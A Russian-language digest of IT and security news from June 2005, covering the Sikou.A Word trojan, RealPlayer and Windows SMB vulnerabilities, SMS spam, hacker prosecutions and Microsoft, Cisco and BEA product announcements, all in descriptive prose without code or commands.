- Интимный процесс первоначального создания "пары" Bluetooth-устройств необходимо проводить в уединенной обстановке - дома или в офисе. Совершенно недопустимо объединять устройство публично.
- Нужно использовать PIN-код соединения, который содержал бы в себе восемь символов (цифр или букв).
- Если по какой-либо причине связь устройств нарушилась, ни в коем случае не пытайтесь возобновить ее в людных местах - дождитесь возможности снова уединится дома или в офисе.
Источник

27/06/2005 14:40 «БиЛайн» и Tuborg пострадали от SMS-спамеров
27 июня 2005 года клиенты оператора сотовой связи ОАО «Вымпел Коммуникации» (торговая марка «БиЛайн») получили SMS-спам. Незапрошенные сообщения содержали рекламу концерта Foo Fighters и Garbage в Москве, проходящего в рамках фестиваля Tuborg Loud & Live. Сообщения, разумеется, были посланы с вполне прагматичной целью — распродать билеты на концерт — и содержали контактные данные сайта parter.ru. Это далеко не первый случай, когда абоненты сотовой связи получают спам по SMS, сообщает проект «Антиспам». SMS-спам от третьих лиц абоненты сотовой связи получают регулярно, а почти года назад сам оператор сотовой связи — МТС — разослал своим абонентам SMS сообщения с рекламой фильма «Ночной дозор», чем вызвал законное возмущение их получателей.
Источник

27/06/2005 14:29 Троянец Sikou.A атакует через Word
Лаборатория компании Panda Software сообщает о появлении нового, исключительно гибкого и сложного троянца Sikou.A, использующего документы Word для распространения. Этот троянец эксплуатирует уязвимость, которая позволяет ему выполнять произвольный код во многих приложениях Microsoft Office. Этот троянец был обнаружен в документе Word, разработанном для эксплуатации уязвимости MS03–037, о которой сообщала Microsoft, позволяющей троянцу запускаться, когда пользователь открывает документ Word. Для своей установки Sikou.A копирует себя в системную директорию и устанавливает два файла, один из которых содержит функции троянца. Второй файл является драйвером, который позволяет троянцу скрывать свою активность от пользователя, что делает обнаружение этого вредоносного кода исключительно сложным. Работая скрыто, троянец пытается произвести доступ к текстовому файлу на URL в интернете, который содержит другой URL и порт, к которому будет произведен доступ на следующем шаге. Этот файл может периодически обновляться создателем вредоносного кода, чтобы местоположение, к которому производит доступ троянец, могло меняться, что затрудняет его нейтрализацию. Троянец производит доступ к URL, с которого скачивается файл, расширяющий его функции. Из-за того, что он периодически обращается к упомянутому URL, Sikou.A обладает высокой способностью изменять свое поведение, так как создателю вредоносного кода требуется лишь изменить текстовый файл, чтобы изменить функции распространенных троянцев. Если файл успешно скачивается, он автоматически подключается к третьему URL, откуда он получает команды, например на выключение компьютера, сбор информации (финансовых или личных данных) или скачивание и запуск файлов. Последнее действие позволяет проникать в компьютер другим типам вредоносных программ, особенно шпионскому ПО, что в дальнейшем позволяет производить кражу информации.
Источник

27/06/2005 13:56 ПО SreenFTP позволяет передавать файлы прямо с экрана компьютера на сотовый телефон
Один из наших посетителей прислал ссылку на довольно любытное ПО, позволяющее передавать (перекачивать) файлы с компьютера на мобильный телефон, не используя различное сторонне "железо" (например, дата-кабель, Bluetooth). Суть программы сводится к установке ПО на компьютер и на сотовый телефон, затем на экране монитора формируется некая последовательность графических изображений, который снимаются на камеру сотового телефона. Затем полученная последовательность изображений декодируется в файл, который помещается в память мобильного телефона. На настоящий момент поддерживается, к сожалению, только Nokia 6600. Для работы программы необходима установка Java на компьютер. В принципе, подобная технология может найти применение при краже данных с компьютера (с некоторыми ограничениями, естественно - как минимум, необходимо установить ПО на компьютер), поскольку исключается возможность задействования внешних носителей (дискеты, USB-флэшки и т.д.). Как известно, в местах работы с конфиденциальными (секретными) данными зачастую из компьютера исключаются флоппи-дисководы, и возможность внешнего подключения через USB. Однако (насколько известно) во многих организациях сотрудникам разрешается пользоваться мобильными телефонами. Разработчик программы - DKJ Research.
О программе

27/06/2005 13:41 Приговор: $71 тысяча штраф и четыре месяца за решеткой
Некий Роберт Литтл (Robert Lyttle), 1984 года рождения, проживающий в городке Плезант-Хилл (США), должен будет заплатить американскому правительству 71 тысячу долларов в возмещение нанесенного ущерба, а также отсидеть четыре месяца за решеткой. Такой суровый приговор вынесен федеральным судьей за то, что молодой человек взломал компьютерную сеть, принадлежащую министерству обороны США. Несмотря на то, что мистер Литтл пытался убедить судью в том, что он действовал их самых лучших побуждений, чтобы обратить внимание компетентных органов на дыры в щите Родины, суд его клятвам не внял и наказал по полной программе. Как было заявлено в ходе оглашения вердикта, Роберт повел себя аки тать в нощи, который, вместо того, чтобы просто в письменном виде в трех экземплярах предупредить хозяев о том, что их замки ненадежны, просто взял и вломился в дом. Помимо выплаты многотысячного штрафа и четырехмесячной отсидки, парню запрещается подходить к домашнему компьютеру до тех пор, пока офицер по условно-досрочному освобождению (ОУДО) не решит, что Роберт больше не является угрозой для общества. Кроме того, сообщает агентство AP, даже после того, как запрет будет снят, ему все равно нельзя будет выходить в интернет, а чтобы ни у кого не возникли в этом сомнение, Роберт должен будет регулярно предъявлять своему ОУДО соответствующий лог-файл.
Источник

27/06/2005 12:15 В Real-плеерах найдены опасные уязвимости
Обнаружены множественные уязвимости в различных медиа-проигрывателях от RealNetworks. Обнаруженные уязвимости позволяют удаленному пользователю выполнить произвольный код на целевой системе. Удаленный пользователь может перезаписать произвольные файлы и выполнить ActiveX-приложения на целевой системе с помощью специально сформированного MP3-файла. Ошибка в функции CRealTextFileFormat::ReadDone() при обработке RealText-потоков может позволить злоумышленнику с помощью специально сформированного файла вызвать переполнение «кучи» (области динамически распределяемой памяти) и выполнить произвольный код. Об уязвимости сообщили iDEFENSE. Также уязвимость существует в библиотеке vidplin.dll и проявляется при обработке .avi-файлов, как сообщили eEye Digital Security . Удаленный пользователь может с помощью специально сформированного .avi-файла вызвать переполнение «кучи» и выполнить произвольный код на целевой системе с привилегиями текущего пользователя. Кроме того, злоумышленник может создать специально сформированную веб-страницу и выполнить MP3- или AVI-файл в проигрывателе. Уязвимы RealPlayer 10.5 (6.0.12.1040–1069), RealPlayer 10, RealOne Player v2, RealOne Player v1, RealPlayer 8, RealPlayer Enterprise, Mac RealPlayer 10 (10.0.0.305 — 331), Mac RealOne Player Linux RealPlayer 10 (10.0.0 — 4), Helix Player (10.0.0 — 4) и Rhapsody 3 (build 0.815 — 0.1006). «Дырам» присвоен рейтинг опасности «высокая».
Уязвимость в обработке AVI
Уязвимость в обработке RealText-потоков

27/06/2005 11:43 Хакеры атаковали ЦИК Болгарии
Информационные системы болгарского ЦИК стали объектами более тысячи атак хакеров, сообщает РБК. Об этом заявил представитель Центризбиркома Болгарии Александр Александров. «В течение дня мы зафиксировали более тысячи атак хакеров», — отметил он, подчеркнув при этом, что проникновений в компьютерную сеть отмечено не было, и компьютерные данные не пострадали. Между тем, по его словам, в связи с активностью компьютерных хулиганов ЦИК страны огласил предварительные результаты парламентских выборов несколько позже, чем это ожидалось.
РБК

27/06/2005 11:21 Хакеры выбирают пользователей Outlook Express
Пользователи Microsoft Outlook Express, читающие новостные группы, рискуют стать жертвой хакерской атаки, сообщает News.com со ссылкой на французское подразделение реагирования на инциденты в области безопасности. Код, созданный на основе недавно обнаруженной уязвимости, можно обнаружить на хакерских веб-ресурсах. Эксперты в области безопасности полагают, что риск масштабной атаки на базе уязвимости в Outlook Express не высок. Для того чтобы атаковать компьютер пользователя хакер должен сделать его подписчиком одной из специальных новостных групп. Кроме того, существующий эксплойт имеет ряд программных изъянов, добавил представитель компании iDefense Майкл Саттон (Michael Sutton). «Программа требует значительного участия пользователя, что снижает общий риск», — подчеркнул Саттон. Тем не менее, iDefense рекомендует пользователям установить обновление Outlook Express, подготовленное Microsoft. Источник угрозы находится в программе для чтения новостей Network News Transfer Protocol. Последствия атаки могут быть очень серьезными. «Хакер может устанавливать программы, просматривать, изменять и удалять данные, создавать новые учетные записи с полным доступом ко всем функциям», — предупреждает Microsoft пользователей в своем бюллетене. Представители Microsoft располагают сведениями о существовании эксплойта для уязвимости в Outlook Express, но ничего не знают о масштабных атаках с использованием этого эксплойта. Разработчики тщательно отслеживают ситуацию, связанную с возможными атаками и рекомендуют пользователям сообщать обо всех инцидентах Microsoft и ФБР. Уязвимость обнаружена в нескольких версиях Outlook Express, в том числе и 5.5 и 6.0 для Windows 2000, XP и Server 2003. При этом жертвой атаки может стать и пользователь, который не запускал Outlook Express.
Подробнее

27/06/2005 10:58 Конфигурирование ядра HP-UX
Opennet.ru сообщает о статье "Configuring an HP-UX Kernel", в которой демонстрируются средства HP-UX 11i Version 2 по управлению параметрами ядра, подгрузке модулей, изменению системных лимитов.
Cтатья

27/06/2005 10:36 Эксплоит уязвимости SMB-клиента ОС Windows
Некто cybertronic сообщает о выпуске PoC (эксплоита), который использует уязвимость в клиенте протокола SMB ОС Windows. Для реализации атаки используется специальный SMB-ответ, вызвающий переполнение буфера из-за ошибки в драйвере MRXSMB.SYS при обработке команд Trans (25h) и Trans2 (32h). Работа эксплоита была проверена на ОС Win2K. Однако, хотелось бы сделать существенное замечание - патч для устранения уязвимости был выпущен Microsoft в феврале 2005 года в бюллетене MS05-011, а обнаружен в августе 2004 компанией eEye.
Эксплоит
Описание уязвимости

27/06/2005 10:05 Microsoft подтвердила свои планы в отношении RSS
В пятницу компания сообщила, что она введет поддержку спецификации Really Simple Syndication (RSS) в следующую версию Internet Explorer, а также в Longhorn, версию Windows, которую планируется выпустить в следующем году. «Мы считаем RSS ключом к тому, как люди станут использовать интернет в будущем, — сказал Гэри Шэр, директор по стратегическому управлению производством отделения Microsoft Windows. — Поэтому в Longhorn мы делаем большую ставку на RSS, интегрируя эту технологию во все компоненты операционной системы». Обычно RSS применяется издателями новостей и блоггерами для оповещения подписчиков о публикации свежей информации. «Pod-станции» (вещающие на iPod) тоже используют эту технологию для информирования слушателей о появлении новых аудиозаписей. Для начала Microsoft планирует сделать подписку на материалы RSS столь же простой операцией, как выбор «избранного» в Internet Explorer. Firefox уже содержит некоторые RSS-функции, а Apple Computer добавила поддержку RSS в версию браузера Safari, включенную в Mac OS X 10.4 Tiger. Шэр сказал, что поддержка RSS будет в версиях Internet Explorer 7.0 как для Longhorn, так и для Windows ХР. Тестовые версии IE7 для обеих ОС планируется выпустить этим летом. Microsoft предлагает также расширить спецификацию RSS, добавив в нее поддержку упорядоченных списков. Это позволит, например, сайтам электронной коммерции упростить публикацию такой информации, как регулярно обновляемый рейтинг наиболее популярных продуктов.
Более подробно

27/06/2005 09:49 ВЕА придаст Java аппаратное ускорение
На предстоящей неделе BEA Systems расскажет о своем плане ускорить работу собственной версии Java для серверов путем исполнения ПО непосредственно на процессорах. Источники, знакомые с планами компании, утверждают, что на выставке JavaOne ВЕА объявит о том, что она работает над проектом JRockit — версией собственного ПО виртуальной машины, исполняющего Java-программы, которая функционирует непосредственно на аппаратуре компьютера. Сегодня большинство версий Java исполняется поверх операционной системы типа Windows, Linux или Solaris. По словам одного источника, ВЕА сможет поддерживать процессоры Intel Xeon, IBM Power и Sun Sparc. BEA — одна из ведущих компаний на рынке Java для серверов. Ее главным конкурентом является IBM, но на пятки наступают и проекты open source, такие как JBoss. Это не единственная компания, пытающаяся придать Java аппаратное ускорение. Первой была Sun, которая выпустила процессор PicoJava, но впоследствии отказалась от него. Затем появились чипы для ускорения Java в сотовых телефонах — продукты таких компаний, как ARM Holdings.
Подробности

27/06/2005 09:25 Украинский хакер похитил со счетов жителей стран Запада 300 тысяч долларов
Сотрудники УБОП Донецкой области Украины задержали специалиста по компьютерным технологиям из города Харцызск, который, как сообщает украинская газета "Сегодня", "разработал схему нелегального перевода денег с чужих банковских счетов через электронные компьютерные сети". Используя взломанные коды к кредитным магнитным картам жителей Западной Европы и США, хакер снимал с их счетов небольшие суммы денег, которые аккумулировал на своем электронном расчетном счете, а потом обналичивал в различных банковских учреждениях по поддельному паспорту. Безналичные деньги со счета похититель тратил на покупку оргтехники и мобильных телефонов через интернет-магазины Европы и Америки. Как установили правоохранительные органы, всего за период с 2003 по 2005 года преступник похитил более 300 тысяч долларов, которые легализовал, покупая недвижимость и автомобили. Сейчас хакер находится в следственном изоляторе, а прокуратура Донецкой области возбудила против него уголовное дело по части 2 статьи 358 УК Украины ("подделка и использование поддельных документов"), по которой ему грозит до 5 лет лишения свободы. Как отметили в пресс-службе УБОП Донецкой области, это один из первых случаев на Украине, когда преступление в области компьютерных технологий было раскрыто, материалы переданы в прокуратуру, и в ближайшее время может состояться суд.
Источник

25/06/2005 12:08 Эпидемия мобильных вирусов начнется не ранее 2007 года
Эпидемия вируса для мобильных устройств возможна не ранее конца 2007 года. Такого мнения придерживаются аналитики компании Gartner, сообщает The Register. Аналитики Джон Пескаторе (John Pescatore) и Джон Жирард (John Girard) считают, что предпосылки для распространения мобильных вирусов (широкий охват аудитории и постоянный обмен исполняемыми файлами) в настоящее время отсутствуют. Говорить о возникновении условий для распространения вирусов можно будет тогда, когда не менее 30 процентов пользователей мобильных устройств будут отправлять и получать электронные письма с вложениями. Такую же долю должны получить на рынке и смартфоны, которые могут быть заражены. Новое заявление Пескаторе и Жирарда развивают идею, которую они озвучили в начале июня: вредоносные программы для мобильных телефонов — нишевое явление. Аналитики Gartner тогда же заявили, что считают неэффективным создание клиентских антивирусных программ для мобильных устройств. По их мнению, обеспечивать безопасность пользователей необходимо на уровне сетей.
Подробности

25/06/2005 11:56 Почти каждый десятый британский сайт не дружит с Firefox
Компания SciVisum провела любопытное исследование: около 100 наиболее посещаемых британских веб-сайтов были протестированы на совместимость с браузером Firefox. Результаты оказались довольно печальными. Приблизительно 10% сайтов отказались "дружить" с бесплатным браузером, разработанным Mozilla Foundation. 3% просто оказываются недоступными для тех, кто использует что-то помимо Internet Explorer, другие 7% содержат в исходном коде нестандартные элементы, которые распознаёт только Microsoft Internet Explorer. К "проблемным" для пользователей Firefox SciVisum относит даже правительственный сайт www.jobcentreplus.gov.uk. Впрочем, сейчас он, кажется, вполне нормально работает и с Firefox. Второй сайт, упомянутый в материале BBC News, - Odeon.co.uk, действительно не работает корректно с Firefox. Исполнительный директор SciVisum Дери Джонс выразил изрядное удивление, что до сих пор "пользователи браузеров, которые полностью соответствуют стандартам консорциума W3C, наталкиваются на сайты, которые либо не поддерживают их браузеры, либо содержат рекомендации скачать Internet Explorer". Причины просты: IE является наиболее распространённым в мире браузером, поэтому веб-мастера предпочитают тестировать свои разработки исключительно с помощью него, а не Opera или Firefox, понимающих только код, ратифицированный World Wide Web Consortium (W3C - организацию, устанавливающую стандарты сетевых языков). По мнению руководителя SciVisum, компании, чьи браузеры несовместимы с Firefox, должны немедленно принять меры к исправлению этого недостатка.
Источник

25/06/2005 10:40 Honey patchset для ядра Linux 2.4.31.
Сергей Сикорский из небольшого городка Калиновка, что в Винницкой области ныне незалежной Украины сделал полезное и очень нужное дело. Собрал воедино набор патчей для ядра Linux 2.4.31, которые выполняют в сумме следующие задачи:
- Патчи для ядра и iptables, реализующие IMQ-устройство. Также включен imq-nat патч - без него (при использовании NAT) подключать фильтры на основе IP-адресов бесполезно.
- Патчи для ядра и iproute2 реализующие ESFQ-дисциплину обработки очереди.
- Патчи для ядра и pppd, реализующие поддержку MPPE/MPPC.
- Патчи для ядра и iptables, реализующие расширения Patch-o-matic (по-умолчанию не все).
- The Openwall Project патч.
Размер файла с патчами - 200КБ.
Подробности

25/06/2005 10:18 Готовится массированная атака червя?
Эксперты встревожены повышением интенсивности сканирования порта, связанного с недавно исправленной уязвимостью Windows. Резкое повышение интенсивности сканирования порта TCP 445, связанного с исправленной на прошлой неделе ошибкой в Windows Server Message Block (SMB), указывает на то, что хакеры, возможно, готовят массированную атаку червя, утверждает аналитик Gartner Джон Пескатор. «Усиленное сканирование не всегда завершается атакой, но значительно повышает ее вероятность. Я не говорю, что обязательно готовится атака червя, но те, кто медлит с исправлением системы, очень рискуют». Как грабители, которые стучатся в двери, подыскивая подходящую жертву, интернет-взломщики иногда проверяют случайные компьютеры на предмет доступности определенного сетевого порта, что может служить предвестником атаки. Порт TCP 445 используется блоком SMB, который Windows применяет для обобщения файлов, принтеров, последовательных портов, а также для связи между компьютерами. Недавно Microsoft в рамках своего ежемесячного цикла исправлений выпустила поправку для «критической» ошибки в этом протоколе. В прошлом усиленное сканирование портов предшествовало крупным эпидемиям червей, уверяет Пескатор. Альфред Хьюгер, старший директор Symantec Security Response, согласен, что, возможно, готовится атака червя. Оба советуют пользователям как можно скорее пропатчить свои системы.
Источник

24/06/2005 13:35 Оборудование Cisco будет "понимать" XML
Глава Cisco Джон Чэмберс официально объявил об открытии нового бизнес-подразделения компании - Application Oriented Networking. В его задачи будет входить разработка основанных на XML технологий, предназначенных для интеграции в сетевое оборудование Cisco функций, реализуемых обычно с помощью ПО промежуточного слоя. Был анонсирован, в частности, модуль для коммутатора Catalyst 6500, способный выполнять синтаксический разбор и защиту трафика сообщений XML и IBM MQ. Аналогичные функции плюс механизм ускорения обработки трафика RFID будут реализованы в специальном лезвии для маршрутизатора Cisco Integrated Services Router, предназначенном для филиалов. Данный маршрутизатор способен распознавать элементы XML-сообщений, например имена заказчиков и денежные суммы в электронных заказах на поставку, и, руководствуясь этой информацией, изменять маршрут трафика или ускорять его передачу. Как сообщают в Cisco, в свете новой инициативы в компании намерены заключить ряд партнерских соглашений с корпорациями уровня IBM, Microsoft и других.
"Открытые системы"

24/06/2005 12:53 Microsoft выпустила блокировщика Windows Server 2003 SP1
Microsoft выпустила инструмент для блокировки автоматической загрузки обновления Service Pack 1 (SP1) для Windows Server 2003. Бесплатный инструмент блокировки предназначен для пользователей, не успевших подготовится к переходу на SP1. Он работает также, как блокировщик Windows XP SP2, отключая службу автоматической загрузки Auto Update и удаляя SP1 из списков Windows Update и Microsoft Update. Блокировщик будет работать до 30 марта 2006 г. В Software Update Services (SUS) и Systems Management Server (SMS) возможности отключить загрузку Windows Server 2003 SP1 не будет. Патч SP1, содержащий обновления для Windows Server 2003, выпущен в марте 2005 г.
Источник

24/06/2005 12:31 Microsoft продолжает скупать антивирусы
Корпорация Microsoft завершила приобретение фирмы Sybari, анонсированное в феврале. Сумма сделки не сообщается. Sybari специализируется в области защиты электронных сообщений от спама и вирусов. Sybari станет подразделением Microsoft, и ее сотрудники будут заниматься обеспечением безопасности продуктов корпорации для обмена почтой, сообщениями и для коллективной работы. На рынке останется ПО Sybari Antigen для Lotus Domino. Разработки систем защиты серверов Unix и Linux будут прекращены, однако поддержка уже существующих клиентов, работающих на этих платформах, продолжится. Руководство Microsoft планирует интегрировать в свои решения технологии сканирования вредоносного кода от Sybari, а также купленной в 2003 г. румынской компании GeCAD. Таким образом, Microsoft может стать серьезным конкурентом нынешним лидерам рынка антивирусного ПО — Symantec и McAfee.
CNews

24/06/2005 11:27 Опасные дыры в медиаплеерах RealNetworks
В распространенных программных плеерах RealNetworks найдены новые уязвимости, некоторые из которых теоретически могут использоваться злоумышленниками с целью выполнения произвольного вредоносного кода на удаленном компьютере. Первая проблема связана с тем, что медиаплееры RealNetworks некорректно обрабатывают сформированные особым образом файлы в формате МР3. Данная дыра позволяет перезаписать информацию на локальных накопителях машины жертвы. Для реализации нападения необходимо вынудить пользователя загрузить и открыть вредоносный МР3-файл, который может быть размещен, например, на веб-сайте в интернете. Для получения несанкционированного доступа к удаленному ПК злоумышленник может задействовать одну из двух других уязвимостей, которые проявляются при обработке сконструированных специальным образом медиафайлов в форматах RealMedia и AVI. В первом случае на компьютере возникает ошибка переполнения "кучи" (области памяти, выделяемой программе для динамически размещаемых структур данных), во втором - ошибка переполнения буфера. Наконец, последняя брешь может использоваться для создания HTML-файлов на машине жертвы. Для реализации атаки необходимо заманить пользователя на вредоносный веб-сайт. Правда, нападение может быть проведено только в том случае, если жертва применяет браузер Internet Explorer ранних версий с настройками по умолчанию. Дыры содержатся в медиаплеерах RealPlayer 8/10/10.5, RealOne Player v1/v2, RealPlayer Enterprise 1.1-1.7 для операционных систем Microsoft Windows, Linux RealPlayer 10, Helix Player, а также RealPlayer 10 и RealOne Player для операционных систем Apple Mac OS.
Страница обновлений

24/06/2005 10:34 SCO обновила свою Unix — и позицию по отношению к open source
Стараясь переломить тенденцию к снижению доходов от Unix, SCO представила в среду новую версию продукта OpenServer — вместе с новой позицией, дружественной к open source. OpenServer 6 основан на том же программном ядре, что и другая операционная система компании, UnixWare, припозднившийся продукт, который SCO и ее предшественники продвигают много лет, но так и не добились такой же популярности как у OpenServer. Новая версия OpenServer способна исполнять ПО, написанное для обеих операционных систем, обеспечивает повышенную в два-четыре раза производительность и может использоваться на 32-процессорных машинах с объемом памяти до 16 Гбайт. ПО компании чаще всего используется фирмами с большим числом отделений — ее знаменитым заказчиком является McDonald's. Однако SCO Group, как и ее предшественник Santa Cruz Operation, страдает от конкуренции со стороны Windows, а в последнее время и Linux. В прошлом финансовом квартале SCO, завершившемся 30 апреля, доходы от Unix снизились до $7,8 млн с $8,4 млн годом раньше. Недавно SCO прославилась своими судебными атаками на IBM, Novell и других за то, что те якобы переносят проприетарный код Unix в операционную систему с открытым исходным кодом Linux. Одной из мишеней таких нападок стала компания AutoZone, бывший заказчик OpenServer. Отчасти атака была направлена на лицензию General Public License (GPL), по которой распространяется Linux и которую юристы SCO считают нарушающей Конституцию США, закон о защите авторских прав, антимонопольный закон и закон о контроле за экспортом. Однако в среду SCO объявила о включении в OpenServer нескольких продуктов open source.
Подробности

24/06/2005 10:19 Корреспондент Sun купил у индийца банковские реквизиты тысячи британцев
Британский таблоид Sun опубликовал репортаж о том, как его корреспонденту удалось приобрести у спекулянта в Дели банковские данные примерно тысячи британских граждан по цене около 5,50 долларов за штуку. По информации, которую корреспонденту удалось узнать, конфиденциальные сведения поступили на "черный рынок" от сотрудников неких индийских "центров приема звонков". В числе украденных реквизитов - адреса, пароли, номера телефонов, кредитных карт, паспортные данные и данные о водительских правах. Платежные реквизиты принадлежат британским отделениям крупных банков HSBC, Barclays и Lloyds TSB. При этом продавец заявил, что его источники в "колл-центрах" могут поставлять до 200 тысяч реквизитов ежемесячно, в том числе личных данных о гражданах США. Вероятно, речь идет о центрах телефонного обслуживания в Индии, которые работают с индийскими отделениями транснациональных финансовых структур. Как сообщает Reuters, британская полиция по факту публикации в газете начала расследование факта утечки конфиденциальных сведений.
Подробности

23/06/2005 14:10 Новшества, ожидаемые в Fedora Core 5 Linux
Опубликован список задач, которые планируется реализовать в следующем релизе Fedora Core Linux, сообщает Opennet.ru. Основные моменты:
- Уменьшение времени загрузки, новая "init" система;
- Улучшение интеграции с Xen и Fedora directory server;
- Продление цикла жизни релиза, поддерживать релиз более полутора лет;
- Графический интерфейс пользователя для управления пакетами и проведения операций обновления (замена system-config-packages), GUI для настройки фаервола, VPN, WiFi (использование Network Manager);
- Создание LiveCD и LiveDVD;
- GUI средство для бэкапа пользовательских данных;
- Увеличение функциональности Exec Shield;
- Утилита для генерации установочного CD, содержащего избранные, и зависимые от них, пакеты;
- Средства шифрования файловой системы и раздела подкачки.
Подробности

23/06/2005 12:53 MS проталкивает SenderID явочным порядком
Еще с октября прошлого года почта с серверов без SPF-записей, приходящая на аккаунты Hotmail, MSN и Microsoft.com, стала подвергаться более тщательной проверке, сообщает bugtraq.ru. Теперь же настало время и для более жесткого шага - с ноября этого года вся такая почта будет сразу помечаться как потенциальный спам. Microsoft надеется, что это поспособствует одобрению SecureID в качестве стандарта. Критики Microsoft не очень довольны этим шагом, считая его попыткой навязать индустрии свою технологию - при том, что она не вполне соответствует существующим стандартам и имеет ряд ограничений.
Подробности

23/06/2005 12:31 Секреты японских ядерщиков утекли в интернет
Из-за компьютерного вируса в интернет попала секретная информация о японских ядерных объектах, сообщает РБК со ссылкой на Reuters. Об этом заявил главный секретарь японского кабинета министров Хироюки Хосоду. Как подчеркнул г-н Хосода, безопасность японских АЭС имеет большое значение, поскольку они могут представлять интерес для террористов. Правительство страны принимает меры по защите конфиденциальных данных, касающихся нескольких атомных станций. По заявлению представителей корпорации Mitsubishi Electric, утечка секретных данных о ядерных объектах произошла из компьютера сотрудника одной из дочерних компаний. Во Всемирной сети появилась информация о 7 государственных атомных станциях и 5 частных компаниях. На всеобщее обозрение, в частности, были вывешены фотографии внутренних помещений, графики инспекций и ремонтно-профилактических работ на АЭС, а также имена их сотрудников.
CNews

23/06/2005 12:13 В Испании арестован известный взломщик P Power
В Испании арестован однин из самых известных взломщиков в интернете. Аресту злоумышленника, действовавшего под ником P Power, предшествовало девятимесячное расследование. При помощи обычного модемного соединения с WWW, старенького компьютера и стандартного софта P Power взламывал системы защиты и получал доступ к дорогостоящим профессиональным компьютерным программам, сообщили представители полиции. Испанские власти пока не раскрыли настоящего имени хакера, известного под псевдонимом P Power, сообщив лишь, что это некий двадцатишестилетний инженер. Тщательно дизассемблировав программы, проанализировав их слабые места и лишив защиты, хакер постил в Сети сообщения, в которых называл себя уникальным взломщиком и рассылал эти крэки бесплатно. В Министерстве внутренних дел Испании особо подчеркнули невозможность возместить ущерб фирмам, пострадашим от такого пиратства, или подсчитать количество пользователей, бесплатно загрузивших крэки.
Подробности

23/06/2005 11:55 Киберпреступники станут атаковать антивирусы
Со снижением количества уязвимостей в операционной системе Windows хакеры начинают обращать внимание на бреши в антивирусных программных продуктах. К такому выводу приходят аналитики из компании Yankee Group, сообщает сайт News.com. ОС Windows долгое время была самым привлекательным объектом для компьютерных преступников, однако сейчас бреши значительно быстрее и чаще появляются в антивирусных продуктах, отмечают в Yankee Group. В течение 15-месячного периода, который заканчивается 31 марта, разработчики антивирусов обнаружили в своих продуктах 77 уязвимостей. Существенный рост брешей был зафиксирован в программах компаний Symantec, F-Secure и CheckPoint Software Technologies. Если существующая ситуация сохранится, число уязвимостей в антивирусных продуктах в этом году будет на 50 процентов больше, чем в прошлом. Yankee Group прогнозирует «нарастающую волну» брешей в антивирусных и антихакерских продуктах и призывает разработчиков тщательнее контролировать процессы безопасности при создании своих продуктов.
Источник

23/06/2005 11:33 Производителей браузеров призывают не блокировать рекламу
Если веб-браузеры начнут по умолчанию блокировать онлайновую рекламу, бесплатному контенту в интернете скоро придет конец, предупреждает топ-менеджер DoubleClick. Бенни Смит, директор онлайновой рекламной сети по вопросам privacy, сказал ZDNet Australia, что популярные инструменты типа Adblock — расширения к браузеру Mozilla Firefox, — блокирующие онлайновую рекламу, легко связать с «негативным отношением к рекламе в целом». Однако только онлайновая арена позволяет производить и широко распространять подобные инструменты. Например, если бы удалось создать подобный инструмент для газет, потребители отвергли бы его. «Вы приходите в ближайший магазин, покупаете ежедневную газету, а там огромные дыры вместо рекламы. Вы решите, что за ваши 25 центов вам дали не всё». Стоимость интернета отчасти содержится в большом количестве бесплатного контента. «Но это не значит, что он ничего не стоит. Я плачу за этот контент тем, что вижу рекламу на каждой странице. Или в e-mail, или рядом с результатами поиска, или где-то там еще», — пояснил Смит. Если производитель каждого браузера включит по умолчанию функцию блокирования рекламы, они подорвут свои собственные позиции как продавцов своих продуктов и издателей контента. «Они нанесут ущерб своим отношениям с заказчиками ради краткосрочного, недальновидного, малоэффективного инструмента. Который им, вероятно, все равно придется убрать с рынка».
Подробности

23/06/2005 10:50 Новые суперкомпьютеры ставят рекорды
Создать один из десяти самых быстрых в мире суперкомпьютеров нелегко, а завоеванный этим престиж становится все более эфемерным. В опубликованном в среду на Международной конференции по суперкомпьютерам в Гейдельбеге (Германния) очередном списке 500 самых мощных суперкомпьютеров пять из десяти первых систем — новички. В этом первом эшелоне доминирует IBM: ей принадлежат шесть систем, пять из которых используют конструкцию Blue Gene, состоящую из шестифутовых (1,83 м) стоек, каждая из которых содержит по 1024 процессора. Список Top500 обновляется дважды в год исследователями из Мангеймского университета, Университета штата Теннесси и Лаборатории им. Лоуренса в Беркли при Министерстве энергетики США. Компьютеры ранжируются по количеству триллионов операций в секунду, или терафлопсов, измеренных при помощи теста на алгебраические вычисления, называемого Linpack. В новом списке произошли значительные изменения. Теперь производительность самой медленной машины близка к совокупной производительности всех суперкомпьютеров из первого списка Top500 за июнь 1993 года. В ноябрьском списке 1998 года была только одна система с быстродействием выше 1 терафлопса, а теперь эту отметку превышают все 500. А лидер списка, 65636-процессорный Blue Gene/L из Национальной лаборатории Лоуренса в Ливерморе, работает быстрее, чем все машины из ноябрьского списка 2001 года, вместе взятые.
Подробнее

23/06/2005 10:12 Урезанная Windows XP N для стран Европы поступила в продажу
В Европе начались продажи модификации Windows XP без встроенного мультимедийного плейера Windows Media Player. Система называется Windows XP N и в настоящее время она продается дистрибьютерам и сборщикам компьютеров, а в течение нескольких недель планируется начать ее розничную продажу. Выпущены английская, французская, немецкая, итальянская и испанская версии, в июле ожидаются версии еще на 10 языках. Как сообщается в газете USA Today, первые дни продажи покупатели не проявили интереса к новой системе. Представители торговых компаний отмечают, что намереваются продавать старые версии системы, так как урезанная версия менее привлекательна для потребителей. Как известно, изменение комплектации поставки ОС Windows было произведено в соответствии с одним из требований Евросоюза, который в прошлом марте подал на Microsoft в суд за нарушение антимонопольных экономических принципов ЕС.
Источник

22/06/2005 14:52 Microsoft ищет бета-тестеров
Компания Microsoft приступила к отбору тестеров, которым предстоит заняться испытаниями антивирусного сервиса OneCare Live. В специальном объявлении, размещенном на сайте OneCare, компания заявила, что тестирование сервиса, который будет предоставлять услуги по поиску вирусов и шпионских программ на пользовательских компьютерах, начнется уже этим летом: в течение ближайших недель. Для начала список тестеров будет сильно ограничен, но через пару месяцев планка входа будет несколько снижена и, может быть, в число испытателей смогут попасть даже люди, живущие за пределами Соединенных Штатов.
Завявление

22/06/2005 13:27 Мобильная версия Inter-PRO для защиты Web-приложений
